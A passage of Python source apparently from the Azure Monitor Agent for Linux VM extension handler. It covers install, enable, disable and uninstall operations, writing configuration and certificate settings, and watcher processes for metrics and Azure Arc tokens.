AMAUninstallCommand = ''
AMAServiceStartCommand = ''
AMAServiceStopCommand = ''
AMAServiceStatusCommand = ''
# Error codes
DPKGLockedErrorCode = 56
MissingorInvalidParameterErrorCode = 53
UnsupportedOperatingSystem = 51
IndeterminateOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.chmod(ext_log_path, 700)
except:
pass
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('Azure Monitoring Agent for Linux started to handle.')
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
elif re.match('^([-/]*)(metrics)', option):
operation = 'Metrics'
elif re.match('^([-/]*)(arc)', option):
operation = 'Arc'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
# Avoid entering broken state where manual purge actions are necessary in low disk space scenario
destructive_operations = ['Disable', 'Uninstall']
if operation not in destructive_operations:
exit_code = check_disk_space_availability()
if exit_code != 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code == 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.Azure.Monitor' \
'.AzureMonitorLinuxAgent'
elif exit_code is DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code != 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except AzureMonitorAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500 :
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def is_systemd():
"""
Check if the system is using systemd
"""
return os.path.isdir("/run/systemd/system")
def get_service_name():
public_settings, protected_settings = get_settings()
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == True:
return "azuremonitoragentmgr"
else:
return "azuremonitoragent"
def install():
"""
Ensure that this VM distro and version are supported.
Install the Azure Monitor Linux Agent package, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
global AMAInstallCommand
find_package_manager("Install")
exit_if_vm_not_supported('Install')
vm_dist, vm_ver = find_vm_distro('Install')
# Check if SUSE 15 VMs have /sbin/insserv package (required for AMA 1.14.4+)
if (vm_dist.lower().startswith('suse') or vm_dist.lower().startswith('sles')) and vm_ver.startswith('15'):
check_insserv, _ = run_command_and_log("which insserv")
if check_insserv != 0:
hutil_log_info("'insserv-compat' package missing from SUSE 15 machine, installing to allow AMA to run.")
insserv_exit_code, insserv_output = run_command_and_log("zypper --non-interactive install insserv-compat")
if insserv_exit_code != 0:
return insserv_exit_code, insserv_output
public_settings, protected_settings = get_settings()
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
os.chmod(bundle_path, 100)
print(PackageManager, " and ", BundleFileName)
AMAInstallCommand = "{0} {1} -i {2}".format(PackageManager, PackageManagerOptions, bundle_path)
hutil_log_info('Running command "{0}"'.format(AMAInstallCommand))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(AMAInstallCommand, retries = 15,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
# Set task limits to max of 65K in suse 12
# Based on Task 9764411: AMA broken after 1.7 in sles 12 - https://dev.azure.com/msazure/One/_workitems/edit/9764411
if vm_dist.lower().startswith('suse'):
try:
suse_exit_code, suse_output = run_command_and_log("mkdir -p /etc/systemd/system/azuremonitoragent.service.d")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo '[Service]' > /etc/systemd/system/azuremonitoragent.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo 'TasksMax=65535' >> /etc/systemd/system/azuremonitoragent.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("systemctl daemon-reload")
if suse_exit_code != 0:
return suse_exit_code, suse_output
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to update /etc/systemd/system/azuremonitoragent.service.d for suse 12,15" )
default_configs = {
"MDSD_CONFIG_DIR" : "/etc/opt/microsoft/azuremonitoragent",
"MDSD_LOG_DIR" : "/var/opt/microsoft/azuremonitoragent/log",
"MDSD_ROLE_PREFIX" : "/run/azuremonitoragent/default",
"MDSD_SPOOL_DIRECTORY" : "/var/opt/microsoft/azuremonitoragent",
"MDSD_OPTIONS" : "\"-A -c /etc/opt/microsoft/azuremonitoragent/mdsd.xml -d -r $MDSD_ROLE_PREFIX -S $MDSD_SPOOL_DIRECTORY/eh -L $MDSD_SPOOL_DIRECTORY/events\"",
"ENABLE_MCS" : "false",
"MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false",
"MDSD_USE_LOCAL_PERSISTENCY" : "true",
#"OMS_TLD" : "int2.microsoftatlanta-int.com",
#"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM",
}
# Decide the mode
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == True:
hutil_log_info("Detecting Auto-Config mode.")
return 0, ""
elif (protected_settings is None or len(protected_settings) == 0) or (public_settings is not None and "proxy" in public_settings and "mode" in public_settings.get("proxy") and public_settings.get("proxy").get("mode") == "application"):
default_configs["ENABLE_MCS"] = "true"
# fetch proxy settings
if public_settings is not None and "proxy" in public_settings and "mode" in public_settings.get("proxy") and public_settings.get("proxy").get("mode") == "application":
default_configs["MDSD_PROXY_MODE"] = "application"
if "address" in public_settings.get("proxy"):
default_configs["MDSD_PROXY_ADDRESS"] = public_settings.get("proxy").get("address")
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, 'Parameter "address" is required in proxy public setting')
if "auth" in public_settings.get("proxy") and public_settings.get("proxy").get("auth") == "true":
if protected_settings is not None and "proxy" in protected_settings and "username" in protected_settings.get("proxy") and "password" in protected_settings.get("proxy"):
default_configs["MDSD_PROXY_USERNAME"] = protected_settings.get("proxy").get("username")
default_configs["MDSD_PROXY_PASSWORD"] = protected_settings.get("proxy").get("password")
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, 'Parameter "username" and "password" not in proxy protected setting')
# add managed identity settings if they were provided
identifier_name, identifier_value, error_msg = get_managed_identity()
if error_msg:
log_and_exit("Install", MissingorInvalidParameterErrorCode, 'Failed to determine managed identity settings. {0}.'.format(error_msg))
if identifier_name and identifier_value:
default_configs["MANAGED_IDENTITY"] = "{0}#{1}".format(identifier_name, identifier_value)
else:
# look for LA protected settings
for var in list(protected_settings.keys()):
if "_key" in var or "_id" in var:
default_configs[var] = protected_settings.get(var)
# check if required GCS params are available
MONITORING_GCS_CERT_CERTFILE = None
if "certificate" in protected_settings:
MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate"))
if "certificatePath" in protected_settings:
try:
with open(protected_settings.get("certificatePath"), 'r') as f:
MONITORING_GCS_CERT_CERTFILE = f.read()
except Exception as ex:
log_and_exit('Install', MissingorInvalidParameterErrorCode, 'Failed to read certificate {0}: {1}'.format(protected_settings.get("certificatePath"), ex))
MONITORING_GCS_CERT_KEYFILE = None
if "certificateKey" in protected_settings:
MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey"))
if "certificateKeyPath" in protected_settings:
try:
with open(protected_settings.get("certificateKeyPath"), 'r') as f:
MONITORING_GCS_CERT_KEYFILE = f.read()
except Exception as ex:
log_and_exit('Install', MissingorInvalidParameterErrorCode, 'Failed to read certificate key {0}: {1}'.format(protected_settings.get("certificateKeyPath"), ex))
MONITORING_GCS_ENVIRONMENT = ""
if "monitoringGCSEnvironment" in protected_settings:
MONITORING_GCS_ENVIRONMENT = protected_settings.get("monitoringGCSEnvironment")
MONITORING_GCS_NAMESPACE = ""
if "namespace" in protected_settings:
MONITORING_GCS_NAMESPACE = protected_settings.get("namespace")
MONITORING_GCS_ACCOUNT = ""
if "monitoringGCSAccount" in protected_settings:
MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount")
MONITORING_GCS_REGION = ""
if "monitoringGCSRegion" in protected_settings:
MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion")
MONITORING_CONFIG_VERSION = ""
if "configVersion" in protected_settings:
MONITORING_CONFIG_VERSION = protected_settings.get("configVersion")
MONITORING_GCS_AUTH_ID_TYPE = ""
if "monitoringGCSAuthIdType" in protected_settings:
MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("monitoringGCSAuthIdType")
MONITORING_GCS_AUTH_ID = ""
if "monitoringGCSAuthId" in protected_settings:
MONITORING_GCS_AUTH_ID = protected_settings.get("monitoringGCSAuthId")
MONITORING_TENANT = ""
if "monitoringTenant" in protected_settings:
MONITORING_TENANT = protected_settings.get("monitoringTenant")
MONITORING_ROLE = ""
if "monitoringRole" in protected_settings:
MONITORING_ROLE = protected_settings.get("monitoringRole")
MONITORING_ROLE_INSTANCE = ""
if "monitoringRoleInstance" in protected_settings:
MONITORING_ROLE_INSTANCE = protected_settings.get("monitoringRoleInstance")
if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE == "")) or MONITORING_GCS_ENVIRONMENT == "" or MONITORING_GCS_NAMESPACE == "" or MONITORING_GCS_ACCOUNT == "" or MONITORING_GCS_REGION == "" or MONITORING_CONFIG_VERSION == "":
waagent_log_error('Not all required GCS parameters are provided')
raise ParameterMissingException
else:
# set the values for GCS
default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true"
default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT
default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE
default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT
default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION
default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION
# write the certificate and key to disk
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
if MONITORING_GCS_AUTH_ID_TYPE != "":
default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE
if MONITORING_GCS_AUTH_ID != "":
default_configs["MONITORING_GCS_AUTH_ID"] = MONITORING_GCS_AUTH_ID
if MONITORING_GCS_CERT_CERTFILE is not None:
default_configs["MONITORING_GCS_CERT_CERTFILE"] = "/etc/opt/microsoft/azuremonitoragent/gcscert.pem"
fh = open("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", "wb")
fh.write(MONITORING_GCS_CERT_CERTFILE)
fh.close()
os.chown("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", 400))
if MONITORING_GCS_CERT_KEYFILE is not None:
default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/opt/microsoft/azuremonitoragent/gcskey.pem"
fh = open("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", "wb")
fh.write(MONITORING_GCS_CERT_KEYFILE)
fh.close()
os.chown("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", 400))
if MONITORING_TENANT != "":
default_configs["MONITORING_TENANT"] = MONITORING_TENANT
if MONITORING_ROLE != "":
default_configs["MONITORING_ROLE"] = MONITORING_ROLE
if MONITORING_TENANT != "":
default_configs["MONITORING_ROLE_INSTANCE"] = MONITORING_ROLE_INSTANCE
config_file = "/etc/default/azuremonitoragent"
config_updated = False
try:
if os.path.isfile(config_file):
data = []
new_data = ""
vars_set = set()
dependent_vars = ["MDSD_OPTIONS"]
# Scope to only dependent envvar being set by extension wrapper
dependent_vars = set(default_configs.keys()).intersection(dependent_vars)
# Copy existing comments/envvar to the updated defaults file; replace existing envvar values if appropriate
with open(config_file, "r") as f:
data = f.readlines()
for line in data:
# Skip definitions of dependent envvar until very end
skip_line = False
for var in dependent_vars:
if "export {0}".format(var) in line:
skip_line = True
break
if skip_line:
continue
for var in list(default_configs.keys()):
if "export {0}".format(var) in line and var not in dependent_vars:
line = "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
break
new_data += line
# Set remaining non-dependent envvar that weren't present in the old defaults file
for var in list(default_configs.keys()):
if var not in vars_set and var not in dependent_vars:
new_data += "export " + var + "=" + default_configs[var] + "\n"
# Finally, set envvar with dependencies (e.g. MDSD_OPTIONS depends on MDSD_LOG)
for var in dependent_vars:
new_data += "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
with open("/etc/default/azuremonitoragent_temp", "w") as f:
f.write(new_data)
config_updated = True if len(new_data) > 0 else False
if not config_updated or not os.path.isfile("/etc/default/azuremonitoragent_temp"):
log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/azuremonitoragent")
os.remove(config_file)
os.rename("/etc/default/azuremonitoragent_temp", config_file)
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
os.chown(config_file, uid, gid)
os.system('chmod {1} {0}'.format(config_file, 400))
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/azuremonitoragent" )
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/azuremonitoragent" )
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the Azure Monitor Linux Agent.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
global AMAUninstallCommand
find_package_manager("Uninstall")
if PackageManager == "dpkg":
AMAUninstallCommand = "dpkg -P azuremonitoragent"
elif PackageManager == "rpm":
AMAUninstallCommand = "rpm -e azuremonitoragent"
else:
log_and_exit("Uninstall", UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
hutil_log_info('Running command "{0}"'.format(AMAUninstallCommand))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(AMAUninstallCommand, retries = 4,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
except Exception as ex:
exit_code = 1
output = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
return exit_code, output
def enable():
"""
Start the Azure Monitor Linux Agent Service
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
global AMAServiceStartCommand, AMAServiceStatusCommand
if HUtilObject:
if(HUtilObject.is_seq_smaller()):
return 0, "Current sequence number, " + HUtilObject._context._seq_no + ", is not greater than the sequence number of the most recent executed configuration. Skipping enable"
exit_if_vm_not_supported('Enable')
# Check if this is Arc VM and enable arc daemon if it is
if metrics_utils.is_arc_installed():
hutil_log_info("This VM is an Arc VM, Running the arc watcher daemon.")
start_arc_process()
service_name = get_service_name()
# Start and enable systemd services so they are started after system reboot.
AMAServiceStartCommand = 'systemctl start {0} && systemctl enable {0}'.format(service_name)
AMAServiceStatusCommand = 'systemctl status {0}'.format(service_name)
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start {0}.".format(service_name))
AMAServiceStartCommand = '/etc/init.d/{0} start'.format(service_name)
AMAServiceStatusCommand = '/etc/init.d/{0} status'.format(service_name)
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_and_log(AMAServiceStartCommand)
if exit_code == 0:
#start metrics process if enable is successful
start_metrics_process()
HUtilObject.save_seq()
else:
status_exit_code, status_output = run_command_and_log(AMAServiceStatusCommand)
if status_exit_code != 0:
output += "Output of '{0}':\n{1}".format(AMAServiceStatusCommand, status_output)
return exit_code, output
def disable():
"""
Disable Azure Monitor Linux Agent process on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
global AMAServiceStopCommand, AMAServiceStatusCommand
# disable arc daemon if it is running
stop_arc_watcher()
#stop the metrics process
stop_metrics_process()
service_name = get_service_name()
# Stop and disable systemd services so they are not started after system reboot.
AMAServiceStopCommand = 'systemctl stop {0} && systemctl disable {0}'.format(service_name)
AMAServiceStatusCommand = 'systemctl status {0}'.format(service_name)
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop {0}.".format(service_name))
AMAServiceStopCommand = '/etc/init.d/{0} stop'.format(service_name)
AMAServiceStatusCommand = '/etc/init.d/{0} status'.format(service_name)
exit_code, output = run_command_and_log(AMAServiceStopCommand)
if exit_code != 0:
status_exit_code, status_output = run_command_and_log(AMAServiceStatusCommand)
if status_exit_code != 0:
output += "Output of '{0}':\n{1}".format(AMAServiceStatusCommand, status_output)
return exit_code, output
def update():
"""
Update the current installation of AzureMonitorLinuxAgent
No logic to install the agent as agent -> install() will be called
with update because upgradeMode = "UpgradeWithInstall" set in HandlerManifest
"""
return 0, ""
def get_managed_identity():
"""
# Determine Managed Identity (MI) settings
# Nomenclature: Managed System Identity (MSI), System-Assigned Identity (SAI), User-Assigned Identity (UAI)
# Unspecified MI scenario: MSI returns SAI token if exists, otherwise returns UAI token if exactly one UAI exists, otherwise failure
# Specified MI scenario: MSI returns token for specified MI
# Returns identifier_name, identifier_value, and error message (if any)
"""
identifier_name = identifier_value = ""
public_settings, protected_settings = get_settings()
if public_settings is not None and "authentication" in public_settings and "managedIdentity" in public_settings.get("authentication"):
managedIdentity = public_settings.get("authentication").get("managedIdentity")
if "identifier-name" not in managedIdentity or "identifier-value" not in managedIdentity:
return identifier_name, identifier_value, 'Parameters "identifier-name" and "identifier-value" are both required in authentication.managedIdentity public setting'
identifier_name = managedIdentity.get("identifier-name")
identifier_value = managedIdentity.get("identifier-value")
if identifier_name not in ["object_id", "client_id", "mi_res_id"]:
return identifier_name, identifier_value, 'Invalid identifier-name provided; must be "object_id", "client_id", or "mi_res_id"'
if not identifier_value:
return identifier_name, identifier_value, 'Invalid identifier-value provided; cannot be empty'
if identifier_name in ["object_id", "client_id"]:
guid_re = re.compile(r'[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')
if not guid_re.search(identifier_value):
return identifier_name, identifier_value, 'Invalid identifier-value provided for {0}; must be a GUID'.format(identifier_name)
return identifier_name, identifier_value, ""
def stop_metrics_process():
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log_info(tel_msg)
else:
hutil_log_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log_info(tel_rm_msg)
else:
hutil_log_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log_info(me_msg)
else:
hutil_log_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log_info(me_rm_msg)
else:
hutil_log_error(me_rm_msg)
pids_filepath = os.path.join(os.getcwd(),'amametrics.pid')
# kill existing metrics watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to AMA metrics watcher.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("agent.py") >= 0 and cmdline[0].find("-metrics") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_metrics_process():
"""
Start metrics process that performs periodic monitoring activities
:return: None
"""
stop_metrics_process()
# Start metrics watcher
ama_path = os.path.join(os.getcwd(), 'agent.py')
args = ['python{0}'.format(sys.version_info[0]), ama_path, '-metrics']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def metrics_watcher(hutil_error, hutil_log):
"""
Watcher thread to monitor metric configuration changes and to take action on them
"""
# Check every 30 seconds
sleepTime = 30
# Retrieve managed identity info that may be needed for token retrieval
identifier_name, identifier_value, error_msg = get_managed_identity()
if error_msg:
hutil_error('Failed to determine managed identity settings; MSI token retreival will rely on default identity, if any. {0}.'.format(error_msg))
# Sleep before starting the monitoring
time.sleep(sleepTime)
last_crc = None
me_msi_token_expiry_epoch = None
while True:
try:
if os.path.isfile(MdsdCounterJsonPath):
f = open(MdsdCounterJsonPath, "r")
data = f.read()
if (data != ''):
json_data = json.loads(data)
if len(json_data) == 0:
last_crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if telhandler.is_running(is_lad=False):
# Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
# Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log(tel_rm_msg)
else:
hutil_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log(me_rm_msg)
else:
hutil_error(me_rm_msg)
else:
crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if(crc != last_crc):
# Resetting the me_msi_token_expiry_epoch variable if we set up ME again.
me_msi_token_expiry_epoch = None
hutil_log("Start processing metric configuration")
hutil_log(data)
telegraf_config, telegraf_namespaces = telhandler.handle_config(
json_data,
"udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port,
"unix:///run/azuremonitoragent/default_influx.socket",
is_lad=False)
me_handler.setup_me(is_lad=False)
start_telegraf_res, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_res:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
last_crc = crc
generate_token = False
me_token_path = os.path.join(os.getcwd(), "/config/metrics_configs/AuthToken-MSI.json")
if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "":
if os.path.isfile(me_token_path):
with open(me_token_path, "r") as f:
authtoken_content = f.read()
if authtoken_content and "expires_on" in authtoken_content:
me_msi_token_expiry_epoch = authtoken_content["expires_on"]
else:
generate_token = True
else:
generate_token = True
if me_msi_token_expiry_epoch:
currentTime = datetime.datetime.now()
token_expiry_time = datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch))
if token_expiry_time - currentTime < datetime.timedelta(minutes=30):
# The MSI Token will expire within 30 minutes. We need to refresh the token
generate_token = True
if generate_token:
generate_token = False
msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token(identifier_name, identifier_value)
if msi_token_generated:
hutil_log("Successfully refreshed metrics-extension MSI Auth token.")
else:
hutil_error(log_messages)
telegraf_restart_retries = 0
me_restart_retries = 0
max_restart_retries = 10
# Check if telegraf is running, if not, then restart
if not telhandler.is_running(is_lad=False):
if telegraf_restart_retries < max_restart_retries:
telegraf_restart_retries += 1
hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries))
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
start_telegraf_res, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_res:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
else:
hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. Please check telegraf.log".format(max_restart_retries))
else:
telegraf_restart_retries = 0
# Check if ME is running, if not, then restart
if not me_handler.is_running(is_lad=False):
if me_restart_retries < max_restart_retries:
me_restart_retries += 1
hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries))
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
else:
hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries))
else:
me_restart_retries = 0
except IOError as e:
hutil_error('I/O error in setting up or monitoring metrics. Exception={0}'.format(e))
except Exception as e:
hutil_error('Error in setting up or monitoring metrics. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def metrics():
"""
Take care of setting up telegraf and ME for metrics if configuration is present
"""
pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
watcher_thread = Thread(target = metrics_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
def start_arc_process():
"""
Start arc process that performs periodic monitoring activities
:return: None
"""
hutil_log_info("stopping previously running arc process")
stop_arc_watcher()
hutil_log_info("starting arc process")
#start arc watcher
ama_path = os.path.join(os.getcwd(), 'agent.py')
args = ['python{0}'.format(sys.version_info[0]), ama_path, '-arc']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def start_arc_watcher():
"""
Take care of starting arc_watcher daemon if the VM has arc running
"""
hutil_log_info("Starting the watcher")
print("Starting the watcher")
pids_filepath = os.path.join(os.getcwd(), 'amaarc.pid')
py_pid = os.getpid()
print("pid ", py_pid)
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
hutil_log_info("Written all the pids")
print("Written all the pids")
watcher_thread = Thread(target = arc_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
'Update' : update,
'Metrics' : metrics,
'Arc' : start_arc_watcher,
}
def stop_arc_watcher():
"""
Take care of stopping arc_watcher daemon if the VM has arc running
"""
pids_filepath = os.path.join(os.getcwd(),'amaarc.pid')
# kill existing arc watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to AMA arc watcher.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("agent.py") >= 0 and cmdline[0].find("-arc") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
# Delete the file after to avoid clutter
os.remove(pids_filepath)
def arc_watcher(hutil_error, hutil_log):
"""
This is needed to override mdsd's syslog permissions restriction which prevents mdsd
from reading temporary key files that are needed to make https calls to get an MSI token for arc during onboarding to download amcs config
This method spins up a process that will continuously keep refreshing that particular file path with valid keys
So that whenever mdsd needs to refresh it's MSI token, it is able to find correct keys there to make the https calls
"""
# check every 25 seconds
sleepTime = 25
# sleep before starting the monitoring.
time.sleep(sleepTime)
while True:
try:
arc_token_mdsd_dir = "/etc/opt/microsoft/azuremonitoragent/arc_tokens/"
if not os.path.exists(arc_token_mdsd_dir):
os.makedirs(arc_token_mdsd_dir)
else:
# delete the existing keys as they might not be valid anymore
for filename in os.listdir(arc_token_mdsd_dir):
filepath = arc_token_mdsd_dir + filename
os.remove(filepath)
arc_endpoint = metrics_utils.get_arc_endpoint()
try:
